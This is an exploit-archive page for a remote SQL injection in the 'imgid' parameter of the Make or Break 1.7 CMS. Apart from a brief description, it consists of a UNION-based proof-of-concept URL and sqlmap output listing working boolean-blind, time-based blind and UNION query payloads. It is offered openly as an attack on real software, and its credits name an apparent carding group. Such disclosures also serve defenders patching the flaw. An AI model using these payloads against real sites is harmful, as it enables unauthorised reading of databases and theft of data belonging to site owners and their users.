exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Make Or Break 1.7 SQL Injection

Make Or Break 1.7 SQL Injection
Posted Jan 10, 2017
Authored by v3n0m

Make or Break version 1.7 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 5521ce024e9e90227233de7ad43a6b6240c66bb22dae10c09285feb34fd12aea

Make Or Break 1.7 SQL Injection

Change Mirror Download
# Exploit   : Make or Break 1.7 (imgid) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
# Software : Make or Break
# Version : 1.7 Lower versions may also be affected
# License : Free
# Download : https://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!

1. Description

An attacker can exploit this vulnerability to read from the database.
The parameter 'imgid' is vulnerable.


2. Proof of Concept

https://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--

# Exploitation via SQLMap

Parameter: imgid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: imgid=1 AND 4688=4688
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: imgid=1 OR SLEEP(2)
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]


3. Security Risk

The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close